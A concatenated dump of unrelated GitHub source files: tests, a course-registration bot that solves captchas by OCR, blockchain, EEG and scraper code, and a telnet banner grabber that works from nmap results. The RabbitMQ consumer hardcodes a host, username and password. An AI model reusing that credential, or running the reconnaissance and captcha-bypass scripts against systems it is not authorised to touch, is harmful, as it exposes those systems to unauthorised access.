(3,)\n assert isinstance(middle_part, cls)\n\n\ndef test_vector_copying():\n for cls in VECTOR_CLASSES:\n vec = cls.create(np.random.random_sample((12,))) # type: ignore\n assert isinstance(vec, cls)\n vec_copy = vec.copy()\n assert vec_copy is not vec\n assert np.array_equal(vec, vec_copy)\n assert isinstance(vec_copy, cls)\n\n\ndef test_excplicit_vector_construction():\n for cls in VECTOR_CLASSES:\n vec = cls(shape=(4,), dtype=np.float64)\n assert isinstance(vec, cls)\n assert vec.shape == (4,)\n assert vec.dtype == np.float64\n\n\ndef test_ufunc_on_vector():\n data = np.array([0.0, 0.25, 0.50])\n expected = np.sin(data)\n for cls in VECTOR_CLASSES:\n vec = cls.create(data) # type: ignore\n result = np.sin(vec)\n assert isinstance(result, cls)\n assert np.array_equal(result, expected)\n\n\ndef test_vector_residuals():\n theory = stat.TheoryVector.from_list([1.0, 2.0, 3.0])\n data = stat.DataVector.from_list([1.1, 2.1, 3.1])\n difference = stat.residuals(data, theory)\n assert isinstance(difference, np.ndarray)\n for cls in VECTOR_CLASSES:\n assert not isinstance(difference, cls)\n\n\ndef test_guarded_statistic_read_only_once(\n sacc_data_for_trivial_stat: sacc.Sacc, trivial_stats: List[stat.TrivialStatistic]\n):\n gs = stat.GuardedStatistic(trivial_stats.pop())\n assert not gs.statistic.ready\n gs.read(sacc_data_for_trivial_stat)\n assert gs.statistic.ready\n with pytest.raises(\n RuntimeError, match=\"Firecrown has called read twice on a GuardedStatistic\"\n ):\n gs.read(sacc_data_for_trivial_stat)\n\n\ndef test_guarded_statistic_get_data_before_read(trivial_stats):\n s = trivial_stats.pop()\n with pytest.raises(\n stat.StatisticUnreadError,\n match=f\"The statistic {s} was used for \"\n f\"calculation before `read` was called.\",\n ):\n g = stat.GuardedStatistic(s)\n _ = g.get_data_vector()\n","repo_name":"LSSTDESC/firecrown","sub_path":"tests/likelihood/gauss_family/statistic/test_statistic.py","file_name":"test_statistic.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"37"} +{"seq_id":"19107251205","text":"# -*- coding: UTF-8 -*-\n\n# filename : coursesGetAndGuess.py\n# author by : SliverYou\n\nimport os\nimport re\nfrom functools import partial\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom prettytable import PrettyTable as pt\n\nfrom tools import s, headers, enter, load_cookies, download_idcode, image_read, Person\nfrom decorate import judge\n\nbs = partial(BeautifulSoup, features='lxml')\n\nhidXNXQ = '2017-20182' # 如果现在是 2017-2018 年度第1学期,这时候要选的课是下一个学期的课,所以学期应为第2学期,即 '2017-20182'\n # 如果现在是 2017-2018 年度第2学期,这时候要选的课是下一个学年下一个学期,应为 '2018-20191',以此类推\n\n\ndef look_courses(html):\n '''\n 打印当前已选公选课课程。\n html: 选课页面的 HTML 字符串。\n '''\n table = bs(html).find_all('table', class_='datelist')[1]\n table_has = None\n\n for i, tr in enumerate(table.find_all('tr')):\n td = tr.find_all('td')\n L = [ x.get_text() for x in td ]\n if i == 0:\n table_has = pt(['课程编号'] + L[:-1])\n else:\n table_has.add_row([i-1] + L[:-1])\n\n print('已选课程如下所示:')\n print(table_has)\n\n\ndef get_select_page(number, nameEncoded):\n '''\n 进入选课页面,返回此时的 Session 对象 和 Response 对象。\n - number: 学��。\n - nameEncoded: 编码过后的姓名。\n '''\n load_cookies()\n\n r = enter('http://jxgl.hdu.edu.cn/xf_xsqxxxk.aspx?xh={0}&xm={1}&gnmkdm=N121113', prompt=False)\n\n data = {\n '__EVENTTARGET': 'ddl_kcgs',\n '__EVENTARGUMENT': '',\n '__LASTFOCUS': '',\n '__VIEWSTATE': bs(r.text).select('input[name=\"__VIEWSTATE\"]')[0]['value'],\n '__EVENTVALIDATION': bs(r.text).select('input[name=\"__EVENTVALIDATION\"]')[0]['value'],\n 'ddl_kcxz': '',\t\n 'ddl_ywyl': '有'.encode('gb2312'),\n 'ddl_kcgs': '',\t\n 'ddl_xqbs': '1',\n 'ddl_sksj': '',\t\n 'TextBox1': '',\n 'Button2': '确定'.encode('gb2312'),\t\n 'txtYz': '',\t\n 'hidXNXQ': hidXNXQ\n }\n\n r = s.post('http://jxgl.hdu.edu.cn/xf_xsqxxxk.aspx?xh={0}&xm={1}&gnmkdm=N121113'.format(number, nameEncoded), data=data, headers=headers) \n return s, r\n\n\ndef go_to_select(xk, s, r):\n '''\n 提交表单,完成选课。\n - xk: 选课编号。\n - s: Session 对象。\n - r: Response 对象。\n\n - return: s, r, result: 提交表单后的 Session 对象, 提交表单后的 Response 对象和验证码校验结果。\n '''\n number = Person.number\n nameEncoded = Person.getNameEncoded('utf8')\n\n download_idcode('http://jxgl.hdu.edu.cn/CheckCode.aspx') # 下载验证码\n idcode = image_read() # 返回验证码识别结果\n print(\"识别结果为:\", idcode, '\\n',sep='')\n\n data = {\n '__EVENTTARGET': '',\n '__EVENTARGUMENT': '',\n '__LASTFOCUS': '',\n '__VIEWSTATE': bs(r.text).select('input[name=\"__VIEWSTATE\"]')[0]['value'],\n '__EVENTVALIDATION': bs(r.text).select('input[name=\"__EVENTVALIDATION\"]')[0]['value'],\n 'ddl_kcxz': '',\t\n 'ddl_ywyl': '有'.encode('gb2312'),\n 'ddl_kcgs': '',\t\n 'ddl_xqbs': '1',\n 'ddl_sksj': '',\t\n 'TextBox1': '',\n xk: 'on',\t\n 'txtYz': idcode,\t\n 'Button1': ' 提交 '.encode('gb2312'),\n 'hidXNXQ': hidXNXQ\n }\n\n s.cookies.load('cookies.txt', ignore_discard=True, ignore_expires=True)\n r = s.post('http://jxgl.hdu.edu.cn/xf_xsqxxxk.aspx?xh={0}&xm={1}&gnmkdm=N121113'.format(number, nameEncoded), data=data, headers=headers)\n\n try:\n result = re.search(\".*?alert\\('(.*?)!!.*?\", r.text[:50], re.S).group(1) # 查看是否有 alert 提醒,如果有返回值,说明验证码校验失败\n except AttributeError:\n # re.search 失败,说明验证么校验成功\n result = 'Yes'\n print('验证码校验成功!\\n')\n\n return s, r, result\n\n\ndef select_courses():\n '''\n 进入选课页面,进行选课操作。\n '''\n number = Person.number\n nameEncoded = Person.getNameEncoded('utf8')\n \n print(\"正在进入选课页面...\") \n s, r = get_select_page(number, nameEncoded)\n print(\"开始爬取选课信息...\") \n\n table = pt([\"编号\", \"课程名称\", \"课程代码\", \"教师姓名\", \"上课时间\", \"学分\", \"起始结束周\", \"容量\", \"余量\", \"课程归属\", \"课程性质\"])\n i = 0\n\n for tr in bs(r.text).find_all('tr')[1:]:\n td = tr.find_all('td')\n L = [ x.get_text() for x in td ]\n l = L[2:6] + [L[7]] + L[9:14]\n\n if '退选' in l:\n # 包含退选关键字的是已选课程,不能放在选课列表。\n break\n\n table.add_row([i] + l) # 记录编号和可选课程的信息\n i = i + 1\n\n print('所有可选课程如下所示:')\n print(table)\n\n while True:\n print('\\n*#*#*#*#*#*#*#*#*\\n')\n print(' 1.按课程编号选课')\n print(' 2.按课程名称选课')\n print(' 3.查看已选课程')\n print(' 4.退选已选课程')\n print(' 5.退出')\n print('\\n*#*#*#*#*#*#*#*#*\\n')\n\n choice = input('请输入你的选择(输入数字即可):')\n print()\n\n choice = judge(choice, 5) # 判断输入格式,确保返回正确的格式。\n\n if choice == 1:\n num = input('请输入将选课程的编号:')\n\n while num.isdigit() is False:\n print('格式输入错误!请输入正确的数字!') \n num = input('请再次输入将选课程的编号:')\n\n num = int(num)\n\n # 检验提交的表单,发现表单要提交的数据是显示标号数+2,所有要将编号数+2后再提交\n if 0 <= num < 8:\n xk = 'kcmcGrid$ctl0{}$xk'.format(num+2)\n elif 8 <= num < i:\n xk = 'kcmcGrid$ctl{}$xk'.format(num+2)\n s, r, result = go_to_select(xk, s, r)\n\n while result == '验证码不正确':\n print('验证码校验失败!正在重新提交...')\n s, r = get_select_page(number, nameEncoded)\n s, r, result = go_to_select(xk, s, r)\n\n print('φ(≧ω≦*)♪选课中...')\n print('......')\n print('成功完成选课٩(๑>◡<๑)۶!\\n')\n look_courses(r.text)\n s.cookies.save('cookies.txt', ignore_discard=True, ignore_expires=True)\n continue\n\n elif choice == 2:\n # 时间有限,还未研发该功能\n break\n\n elif choice == 3:\n look_courses(r.text)\n s.cookies.save('cookies.txt', ignore_discard=True, ignore_expires=True)\n continue\n\n elif choice == 4:\n print('正在进行退课操作!请谨慎操作!(可按q退出退课操作)')\n num = input('请输入需要退选的课程编号:')\n\n if num == 'q':\n continue\n\n num = input('请再次确认需要退选的课程编号:') # 退课需谨慎,所以需要重复两次确认操作\n \n while num.isdigit() is False:\n print('格式输入错误!请输入正确的数字!') \n num = input('请再次输入需要退选课程的编号:')\n\n num = int(num)\n\n if 0 <= num < 8:\n tk = 'DataGrid2$ctl0{}$ctl00'.format(num+2)\n elif 8 <= num < i:\n tk = 'DataGrid2$ctl{}$ctl00'.format(num+2)\n\n data = {\n '__EVENTTARGET': tk,\n '__EVENTARGUMENT': '',\n '__LASTFOCUS': '',\n '__VIEWSTATE': bs(r.text).select('input[name=\"__VIEWSTATE\"]')[0]['value'],\n '__EVENTVALIDATION': bs(r.text).select('input[name=\"__EVENTVALIDATION\"]')[0]['value'],\n 'ddl_kcxz': '',\t\n 'ddl_ywyl': '有'.encode('gb2312'),\n 'ddl_kcgs': '',\t\n 'ddl_xqbs': '1',\n 'ddl_sksj': '',\t\n 'TextBox1': '',\t\n 'txtYz': '',\t\n 'hidXNXQ': hidXNXQ\n }\n\n r = s.post('http://jxgl.hdu.edu.cn/xf_xsqxxxk.aspx?xh={0}&xm={1}&gnmkdm=N121113'.format(number, nameEncoded), data=data, headers=headers)\n\n print('\\nφ(≧ω≦*)♪退课中...')\n print('......')\n print('成功完成退课٩(๑>◡<๑)۶!\\n')\n\n look_courses(r.text)\n s.cookies.save('cookies.txt', ignore_discard=True, ignore_expires=True)\n continue\n\n elif choice == 5:\n break","repo_name":"sliveryou/hdu-spider","sub_path":"selectCourses.py","file_name":"selectCourses.py","file_ext":"py","file_size_in_byte":8701,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41360380955","text":"import uuid\nimport time\n\nfrom backend.wallet.wallet import Wallet\n\nclass Transaction:\n \"\"\"\n Document of an exchange in currency from a sender to one or more recipients.\n \"\"\"\n def __init__(\n self = None,\n sender_wallet = None,\n recipient = None,\n amount = None,\n id = None,\n output = None,\n input = None\n ): # by giving parameters None value here means we set their default value to None\n # so we don't have to pass in the value for each every parameter when we call the function\n self.id = id or str(uuid.uuid4())[0:8] # if transaction id is provided in the parameters above\n # then we can directly use it, otherwise we have to generate a new one\n self.output = output or self.create_output(\n sender_wallet,\n recipient,\n amount\n )\n self.input = input or self.create_input(sender_wallet, self.output)\n \n def create_output(self, sender_wallet, recipient, amount):\n \"\"\"\n Structure the output data for the transaction.\n How much the sender want to send and to which address.\n \"\"\"\n if amount > sender_wallet.balance:\n raise Exception('Amount exceeds balance')\n\n output = {}\n output[recipient] = amount\n output[sender_wallet.address] = sender_wallet.balance - amount # this will return the \n # balance after the sender send money to the recipient\n\n return output\n\n def create_input(self, sender_wallet, output):\n \"\"\"\n Structure the input data for the transaction.\n Sign the transaction and include the sender's public key and address.\n It's the sender's information.\n \"\"\"\n return {\n 'timestamp': time.time_ns(),\n 'amount': sender_wallet.balance,\n 'address': sender_wallet.address,\n 'public_key': sender_wallet.public_key,\n 'signature': sender_wallet.sign(output) # to make a signature on behalf of the sender wallet\n # and the signature should be generated based on the output data \n }\n\n def update(self, sender_wallet, recipient, amount):\n \"\"\"\n Updated the transaction with an existing or new recipient.\n \"\"\"\n if amount > self.output[sender_wallet.address]:\n raise Exception('Amount exceeds balance')\n\n if recipient in self.output:\n self.output[recipient] = self.output[recipient] + amount \n # because we are sending more to this existed recipient\n else: # new receipient\n self.output[recipient] = amount\n\n self.output[sender_wallet.address] = self.output[sender_wallet.address] - amount\n\n self.input = self.create_input(sender_wallet, self.output)\n # to generate new signature, we recreate new input rather than update old input\n\n def to_json(self):\n \"\"\"\n Serialize the transction.\n \"\"\"\n return self.__dict__\n\n @staticmethod\n def from_json(transaction_json):\n \"\"\"\n Deserialize a transaction json representation back into a Transaction instance.\n \"\"\"\n return Transaction(**transaction_json) # because we pass in the same exact arguments of transaction_json into this function\n # which is the same as:\n # return Transaction(\n # id = transaction_json['id'],\n # output = transaction_json['output'],\n # input = transaction_json['input']\n #)\n\n @staticmethod\n def is_valid_transaction(transaction):\n \"\"\"\n Validate a transaction\n Raise an exception for invalid transactions.\n \"\"\"\n output_total = sum(transaction.output.values())\n\n if transaction.input['amount'] != output_total:\n raise Exception('Invalid transaction output values')\n\n if not Wallet.verify(\n transaction.input['public_key'],\n transaction.output,\n transaction.input['signature']\n ): # which means the transaction is invalid\n raise Exception('Invalid signature')\n\ndef main():\n transaction = Transaction(Wallet(), 'recipient', 15)\n # which means the sender sends 15 to the recipient\n print(f'transaction.__dict__: {transaction.__dict__}')\n\n transaction_json = transaction.to_json()\n restored_transaction = Transaction.from_json(transaction_json)\n print(f'restored_transaction.__dict__: {restored_transaction.__dict__}')\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"TwylaWeiyuTang/Blockchain","sub_path":"backend/wallet/transaction.py","file_name":"transaction.py","file_ext":"py","file_size_in_byte":4509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25668814785","text":"from setuptools import setup, find_packages\nimport sys, os\n\nversion = '0.1'\n\nsetup(name='s3dl',\n version=version,\n description=\"Makes downloading s3 files easier\",\n long_description=\"\",\n classifiers=[], # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers\n keywords='',\n author='Will Gardner',\n author_email='will.gardner@couchbase.com',\n url='',\n license='MIT',\n packages=['s3dl'],\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'boto3>1.3.0'\n ],\n entry_points={\n \"console_scripts\": [\n \"s3dl=s3dl.s3dl:main\",\n ],\n })\n","repo_name":"couchbaselabs/s3dl","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} +{"seq_id":"42087334692","text":"def powmod(a,b,m):\n result = 1\n while b > 0:\n if b % 2 != 0:\n result = (result * a) % m\n b //= 2\n a = (a * a) % m\n\n return result\n\ndef mr(n,a):\n r = 0\n d = n-1\n while (d%2 == 0):\n r += 1\n d = d // 2\n x = powmod(a,d,n)\n if x == 1 or x == n-1:\n return True\n for i in range(0,r-1):\n x = powmod(x,2,n)\n if x == n-1:\n return True\n return False\n\nimport sys\nans = 0\nm = int(sys.stdin.readline())\nfor i in range(m):\n k = int(sys.stdin.readline())\n check = 0\n for i in [2, 3,5,7,11]:\n if mr(2*k+1,i) == False:\n break\n else:\n check += 1\n if check == 5:\n ans += 1\nprint(ans)","repo_name":"subinmun1997/my_python-for-coding-test","sub_path":"BAEKJOON/solution640.py","file_name":"solution640.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"26284214088","text":"class Solution(object):\n def convert(self, s, numRows):\n \"\"\"\n :type s: str\n :type numRows: int\n :rtype: str\n \"\"\"\n row, col = 0, 0\n string_matrix = {}\n char_iter = 0\n for i in range(0, numRows):\n string_matrix[i] = {}\n\n while char_iter < len(s):\n row = 0\n while row < numRows and char_iter < len(s):\n # print \"about to print char {} len {}\".format(char_iter, len(s))\n # print \"char {}\".format(s[char_iter])\n string_matrix[row][col] = s[char_iter]\n char_iter += 1\n if row + 1 == numRows:\n break\n row += 1\n\n row -= 1\n col += 1\n while row >= 1 and char_iter < len(s):\n string_matrix[row][col] = s[char_iter]\n col += 1\n char_iter += 1\n if row - 1 < 1:\n break\n row -= 1\n\n print_str = \"\"\n for row in sorted(string_matrix.keys()):\n for col in sorted(string_matrix[row].keys()):\n print_str += string_matrix[row][col]\n return print_str\n","repo_name":"humanalgorithm/leetcode_solutions","sub_path":"zigzag-conversion/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18958071787","text":"import pika\n\nconnection = pika.BlockingConnection(pika.ConnectionParameters(\n host='10.176.139.8',\n port=5672,\n virtual_host=\"/devops\",\n credentials=pika.PlainCredentials(\"devops\", \"q9wCFiEti7UuxYFPr3q0Xw\")\n))\nchannel = connection.channel()\n\n\ndef callback(ch, method, properties, body):\n print(\" [x] Received %r\" % body)\n\n\n# channel.basic_qos(prefetch_count=1)\nchannel.basic_consume('world', callback, False)\nprint(' [*] Waiting for messages. To exit press CTRL+C')\nchannel.start_consuming()\n","repo_name":"bobowang2017/python_study","sub_path":"rabbitmq/helloworld/receive2.py","file_name":"receive2.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75192744426","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 1 12:02:43 2021\n\n@author: claire.dussard\n\"\"\"\nimport os \nimport seaborn as sns\nimport pathlib\nimport mne\n#necessite d'avoir execute handleData_subject.py, et load_savedData avant \nimport numpy as np \n#pour se placer dans les donnees lustre\nos.chdir(\"../../../../..\")\nlustre_data_dir = \"cenir/analyse/meeg/BETAPARK/_RAW_DATA\"\nlustre_path = pathlib.Path(lustre_data_dir)\nos.chdir(lustre_path)\n\nsujetsPb = [11]\nfor sujetpb in sujetsPb:\n allSujetsDispo.remove(sujetpb)\n\nessaisMainRest = [\"9-2\" for i in range(25)]\nessaisMainIllusionRest = [\"10-2\" for i in range(25)]\nliste_rawPathMain = createListeCheminsSignaux(essaisMainRest,listeNumSujetsFinale, allSujetsDispo,SujetsPbNomFichiers,listeDatesFinale)\nliste_rawPathMainIllusion = createListeCheminsSignaux(essaisMainIllusionRest,listeNumSujetsFinale, allSujetsDispo,SujetsPbNomFichiers,listeDatesFinale)\n\nevent_id_mainIllusion = {'Essai_mainIllusion':3}\nevent_id_main={'Essai_main':3} \n\n\n#=================================================================================================================================\n #METHODE AVERAGE EPOCHS SUJETS\n#=================================================================================================================================\n\nnbSujets = 24\nSujetsDejaTraites = 0\nrawPath_main_sujets = liste_rawPathMain[SujetsDejaTraites:SujetsDejaTraites+nbSujets]\nrawPath_mainIllusion_sujets = liste_rawPathMainIllusion[SujetsDejaTraites:SujetsDejaTraites+nbSujets]\n\n\nlisteEpochs_main,listeICA_main,listeEpochs_mainIllusion,listeICA_mainIllusion = all_conditions_analysis_NFBRest(allSujetsDispo,rawPath_main_sujets,rawPath_mainIllusion_sujets,\n event_id_main,event_id_mainIllusion,\n 0.1,1,90,[50,100],'Fz')\n\n#sujets 15 et 16 a jeter / verif raw : vagues partout\n\nsaveEpochsAfterICA(listeEpochs_main,rawPath_main_sujets)\nsave_ICA_files(listeICA_main,rawPath_main_sujets)\nsaveEpochsAfterICA(listeEpochs_mainIllusion,rawPath_mainIllusion_sujets)\nsave_ICA_files(listeICA_mainIllusion,rawPath_mainIllusion_sujets)\n\nEpochDataMain = load_data_postICA(rawPath_main_sujets,\"\")\n\nEpochDataMainIllusion = load_data_postICA(rawPath_mainIllusion_sujets,\"\")\n\n#===================set montage===IMPORTANT!!!!=======================\nmontageEasyCap = mne.channels.make_standard_montage('easycap-M1')\nfor epochs in EpochDataMain:\n if epochs!=None:\n epochs.set_montage(montageEasyCap)\nfor epochs in EpochDataMainIllusion:\n if epochs!=None:\n epochs.set_montage(montageEasyCap)\n \n \nliste_power_main = plotSave_power_topo_cond(EpochDataMain,rawPath_main_sujets,3,85,\"NFBrest_main\",250.,1.5,25.5)#needs to have set up the electrode montage before\nliste_power_mainIllusion = plotSave_power_topo_cond(EpochDataMainIllusion,rawPath_mainIllusion_sujets,3,85,\"NFBrest_mainIllusion\",250.,1.5,25.5)\n\nsave_tfr_data(liste_power_main,rawPath_main_sujets,\"\")\n\nsave_tfr_data(liste_power_mainIllusion,rawPath_mainIllusion_sujets,\"\")\n\n#===================apply a baseline by subject before grand averaging=========================\n\ndureePreBaseline = 4\ndureePreBaseline = - dureePreBaseline\ndureeBaseline = 3.0\nvaleurPostBaseline = dureePreBaseline + dureeBaseline\n\nbaseline = (dureePreBaseline, valeurPostBaseline)\nfor tfr in liste_power_mainIllusion:\n tfr.apply_baseline(baseline=baseline, mode='logratio', verbose=None)\n \nav_power_main_rest = mne.grand_average(liste_power_main,interpolate_bads=True)\nsave_topo_data(av_power_main_rest,dureePreBaseline,valeurPostBaseline,\"all_sujets\",mode,\"NFBrest_main\",False,1.5,25.5)\n\nav_power_mainIllusion_rest = mne.grand_average(liste_power_mainIllusion,interpolate_bads=True)\nsave_topo_data(av_power_mainIllusion_rest,dureePreBaseline,valeurPostBaseline,\"all_sujets\",mode,\"NFBrest_mainIllusion\",False,1.5,25.5)\n\nav_power_main_rest.save(\"../AV_TFR/all_sujets/main_NFBrest-tfr.h5\",overwrite=True)\nav_power_mainIllusion_rest.save(\"../AV_TFR/all_sujets/mainIllusion_NFBrest-tfr.h5\",overwrite=True)\n#========== compute difference between conditions ========================\navpower_main_moins_mainIllusion = av_power_main_rest - av_power_mainIllusion_rest\n\nsave_topo_data(avpower_main_moins_mainIllusion,dureePreBaseline,valeurPostBaseline,\"all_sujets\",mode,\"NFBrest_main-mainIllusion\",False,1.5,25.5)","repo_name":"cdussard/M2data_analysis","sub_path":"analyse_M2/functions/NFBRest.py","file_name":"NFBRest.py","file_ext":"py","file_size_in_byte":4411,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18352256888","text":"from django.urls import path\nfrom.import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('Home', views.index, name='index'),\n path('login_in',views.login_in,name='login_in'),\n path('Login_Res',views.Login_Res),\n path('Logout_Window',views.Logout_Window),\n path('add_customers',views.add_customers),\n path('customer_view', views.customer_view),\n path('customers_details', views.customers_details),\n path('add_lineworkers', views.add_lineworkers),\n path('lineworkers_details', views.lineworkers_details),\n path('cus_reg_submit',views.cus_reg_submit),\n path('line_reg_submit',views.line_reg_submit),\n path('Password_window',views.Password_window),\n path('customer_contact', views.customer_contact),\n path('admin_plan_reg',views.admin_plan_reg),\n path('admin_plan_res',views.admin_plan_res),\n path('admin_plan_view', views.admin_plan_view),\n path('admin_plan_update', views.admin_plan_update),\n path('admin_plan_updated_res', views.admin_plan_updated_res),\n path('customer_profile',views.customer_profile),\n path('worker_profile', views.worker_profile),\n path('customer_delete', views.customer_delete),\n path('Dashboard', views.Dashboard),\n path('Admin_page',views.Admin_page),\n path('Admin_oldpswd',views.Admin_oldpswd),\n path('request_form',views.request_form),\n path('requst_res',views.requst_res),\n path('request_submit',views.request_submit),\n path('worker_inbox',views.worker_inbox),\n path('customer_inform',views.customer_inform),\n path('inform_submit',views.inform_submit),\n path('complaints',views.complaints),\n path('worker_plan_view',views.worker_plan_view),\n path('lineworker_page',views.lineworker_page),\n path(\"customer_plan_view\",views.customer_plan_view),\n path('Customer_page',views.lineworker_page),\n path('About',views.About),\n]\n","repo_name":"IsmailAvayil/Fibronet_Assignment","sub_path":"Broadband/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33291992269","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\nfrom distutils.core import setup, Extension\nfrom setuptools.command.build_ext import build_ext\nfrom setuptools.command.install_lib import install_lib\nimport subprocess\nfrom sys import platform\n\nroot_dir = os.path.realpath(os.path.abspath(os.path.dirname(__file__)))\nfunchook_dir = os.path.join(root_dir, \"funchook\")\n\n\nclass Build(build_ext):\n def run(self):\n if platform == \"win32\":\n cmake_cmd = \"\"\"\n cmake.exe ..\n cmake.exe --build . --config Release\n \"\"\"\n shell = \"cmd\"\n else:\n cmake_cmd = \"\"\"\n cmake -DCMAKE_BUILD_TYPE=Release -DFUNCHOOK_BUILD_TESTS=OFF ..\n make\n \"\"\"\n shell = \"bash\"\n funchook_build_dir = os.path.join(funchook_dir, \"build\")\n if not os.path.exists(funchook_build_dir):\n os.mkdir(funchook_build_dir)\n build_script = \"\"\"\n cd %s\n %s\n \"\"\" % (\n funchook_build_dir,\n cmake_cmd,\n )\n process = subprocess.Popen(shell, stdin=subprocess.PIPE, stdout=sys.stdout)\n out, err = process.communicate(build_script.encode(\"utf-8\"))\n build_ext.run(self)\n if platform == \"win32\":\n return\n\n funchook_name = \"libfunchook.so.1\"\n self.copy_file(os.path.join(funchook_build_dir, funchook_name), os.path.join(root_dir, \"hook\", funchook_name))\n\n\nclass InstallLib(install_lib):\n def run(self):\n install_lib.run(self)\n\n\ndef build_hook_ext():\n platform_args = []\n link_args = []\n extra_compile_args = []\n strict_build_args = []\n runtime_library_dirs = []\n\n if platform == \"win32\":\n libraries = [\"funchook\", \"distorm\"]\n library_dirs = [\n os.path.join(funchook_dir, \"build\", \"Release\"),\n ]\n else:\n libraries = [\"funchook\"]\n runtime_library_dirs = [\"$ORIGIN\"]\n library_dirs = [\n os.path.join(funchook_dir, \"build\"),\n ]\n platform_args = [\"-Wno-cast-function-type\"]\n\n extra_compile_args = [\n \"-Wall\",\n \"-Wextra\",\n \"-Wno-unused-parameter\",\n \"-Wmissing-field-initializers\",\n ]\n extensions = [\n Extension(\n \"hook.fh_hook\",\n [os.path.join(root_dir, \"hook\", \"fh_hook.c\")],\n libraries=libraries,\n include_dirs=[os.path.join(funchook_dir, \"include\"), ],\n library_dirs=library_dirs,\n runtime_library_dirs=runtime_library_dirs,\n extra_compile_args=extra_compile_args + strict_build_args + platform_args,\n extra_link_args=link_args,\n ),\n ]\n s_args = [\"build_ext\", \"-b\", os.path.join(root_dir)]\n setup(name=\"hook\", ext_modules=extensions,\n cmdclass=dict(build_ext=Build, install_lib=InstallLib), script_args=s_args, verbose=True, )\n\n\nif __name__ == '__main__':\n build_hook_ext()\n","repo_name":"liue0izt/str-hook-demo","sub_path":"build_hook_ext.py","file_name":"build_hook_ext.py","file_ext":"py","file_size_in_byte":2986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14064891847","text":"#!/usr/bin/env python\nimport sys,os\nimport subprocess\n# this module requires requests library\nfrom common import *\nimport urllib\nimport telnetlib\nimport time\n\nresult_obj = {}\noutput_path = 'output/'\n\ndef grab_banner(host, **kwargs):\n t = telnetlib.Telnet()\n t.open(host,23,kwargs['timeout'])\n # 3 seconds for waiting before grabing anything\n time.sleep(3)\n message = t.read_until()\n if message is None:\n raise Exception(\"timed out\")\n log_green(message)\n t.close()\n \n\ndef main():\n hosts = grep_hosts(sys.argv[1], GNMAP_TELNET)\n # for each host, we need to perform the following logic\n # 1. test server response, to obtain\n # 1.1 server fingerprinting\n # - we are not re-inventing the wheel here. We just try to grab server header as quick as possible. Real fingerprinting kung fu should go to nmap instead\n # 1.2 root / response\n # - try to text2html and screenshot\n # - if forbidden at least show the content\n # 1.3 robots.txt\n # - alert if exists\n # - iterate entries\n # 1.4 dirbusting?\n \"\"\"\n log('test')\n log_green('test_green')\n log_red('test_red')\n log_blue('test_blue')\n log('test_white')\n \"\"\"\n try:\n os.mkdir(output_path)\n except OSError:\n pass\n \n\n options={'timeout':5, 'verify':False}\n for host in hosts:\n log(\"*** HOST %s ***\" % host)\n try:\n grab_banner(host, **options)\n except:\n log_red(\"%s timed out. Skipping to next host\" % host)\n\n\n \n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2:\n usage()\n else:\n main()\n","repo_name":"hkcharles/hackit","sub_path":"scripts/telnet.py","file_name":"telnet.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29664365873","text":"import logging\nfrom pathlib import Path\n\nfrom bs4 import BeautifulSoup\n\nfrom .. import utils\nfrom ..cache import Cache\n\n__authors__ = [\"zstumgoren\", \"Dilcia19\", \"shallotly\"]\n__tags__ = [\"html\", \"csv\"]\n__source__ = {\n \"name\": \"Virginia Employment Commission\",\n \"url\": \"https://www.vec.virginia.gov/warn-notices\",\n}\n\nlogger = logging.getLogger(__name__)\n\n\ndef scrape(\n data_dir: Path = utils.WARN_DATA_DIR,\n cache_dir: Path = utils.WARN_CACHE_DIR,\n) -> Path:\n \"\"\"\n Scrape data from Virginia.\n\n Keyword arguments:\n data_dir -- the Path were the result will be saved (default WARN_DATA_DIR)\n cache_dir -- the Path where results can be cached (default WARN_CACHE_DIR)\n\n Returns: the Path where the file is written\n \"\"\"\n # Get the WARN page\n url = \"https://www.vec.virginia.gov/warn-notices\"\n r = utils.get_url(url, verify=False)\n html = r.text\n\n # Save it to the cache\n cache = Cache(cache_dir)\n cache.write(\"va/source.html\", html)\n\n # Parse out the CSV download link\n soup = BeautifulSoup(html, \"html.parser\")\n csv_href = soup.find(\"a\", text=\"Download\")[\"href\"]\n csv_url = f\"https://www.vec.virginia.gov{csv_href}\"\n\n # Download it to the cache\n cache.download(\"va/source.csv\", csv_url, verify=False)\n\n # Open it up as a list of rows\n csv_rows = cache.read_csv(\"va/source.csv\")\n\n # Set the export path\n data_path = data_dir / \"va.csv\"\n\n # Write out the file\n utils.write_rows_to_csv(data_path, csv_rows)\n\n # Return the export path\n return data_path\n\n\nif __name__ == \"__main__\":\n 